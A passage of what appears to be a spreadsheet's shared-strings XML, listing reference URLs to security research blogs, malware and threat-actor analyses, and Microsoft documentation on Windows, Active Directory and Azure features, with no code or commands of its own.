    <t>https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30</t>
  </si>
  <si>
    <t>https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4</t>
  </si>
  <si>
    <t>https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62</t>
  </si>
  <si>
    <t>https://posts.specterops.io/certified-pre-owned-d95910965cd2</t>
  </si>
  <si>
    <t>https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea</t>
  </si>
  <si>
    <t>https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc</t>
  </si>
  <si>
    <t>https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96</t>
  </si>
  <si>
    <t>https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000</t>
  </si>
  <si>
    <t>https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4</t>
  </si>
  <si>
    <t>https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63</t>
  </si>
  <si>
    <t>https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b</t>
  </si>
  <si>
    <t>https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767</t>
  </si>
  <si>
    <t>https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be</t>
  </si>
  <si>
    <t>https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3</t>
  </si>
  <si>
    <t>https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref</t>
  </si>
  <si>
    <t>https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh</t>
  </si>
  <si>
    <t>http://adsecurity.org/?p=1275</t>
  </si>
  <si>
    <t>http://www.crowdstrike.com/blog/whois-numbered-panda/</t>
  </si>
  <si>
    <t>https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens</t>
  </si>
  <si>
    <t>https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/</t>
  </si>
  <si>
    <t>https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/bits/about-bits</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor</t>
  </si>
  <si>
    <t>http://support.microsoft.com/kb/314984</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/administration/windows-commands/assoc</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms537359.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity#block-end-user-consent</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/aa362813.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)</t>
  </si>
  <si>
    <t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625</t>
  </si>
  <si>
    <t>https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs</t>
  </si>
  <si>
    <t>https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog</t>
  </si>
  <si>
    <t>https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms694363.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/dn408187.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/ms682425</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/security/4053440</t>
  </si>
  <si>
    <t>http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-US/library/ms682586</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/cc228086.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/</t>
  </si>
  <si>
    <t>https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/</t>
  </si>
  <si>
    <t>https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/ms677626.aspx</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/kb/967715</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc771387.aspx</t>
  </si>
  <si>
    <t>https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/jj865668.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms677982.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh875546(v=ws.11)</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/bb166549.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/fileio/file-management</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/aa364404</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/dd252791.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/cc422924.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/ee617241.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&amp;view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/dd207691.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/windows/desktop/ms644670</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/windows/desktop/ms524405</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx</t>
  </si>
  <si>
    <t>http://support.microsoft.com/KB/170292</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/dd939934.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript</t>
  </si>
  <si>
    <t>http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet</t>
  </si>
  <si>
    <t>https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285</t>
  </si>
  <si>
    <t>https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows-server/administration/windows-commands/klist</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/dn408187.aspx</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A</t>
  </si>
  <si>
    <t>https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-</t>
  </si>
  <si>
    <t>http://support.microsoft.com/kb/2962486</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal</t>
  </si>
  <si>
    <t>https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-US/library/aa375365</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</t>
  </si>
  <si>
    <t>https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/cc237008.aspx</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/help/556003</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/aa939914</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc835085.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj852185(v=ws.11)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/</t>
  </si>
  <si>
    <t>https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/</t>
  </si>
  <si>
    <t>https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb</t>
  </si>
  <si>
    <t>https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/</t>
  </si>
  <si>
    <t>https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/</t>
  </si>
  <si>
    <t>https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/</t>
  </si>
  <si>
    <t>https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3aWin32%2fPoisonivy.E</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group</t>
  </si>
  <si>
    <t>https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc732643.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/sysinternals/downloads/reghide</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/kb/249873</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc754820.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/win32/termserv/about-terminal-services</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-everything/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token</t>
  </si>
  <si>
    <t>https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/aa376977</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/kb/310105</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/cc245496.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx</t>
  </si>
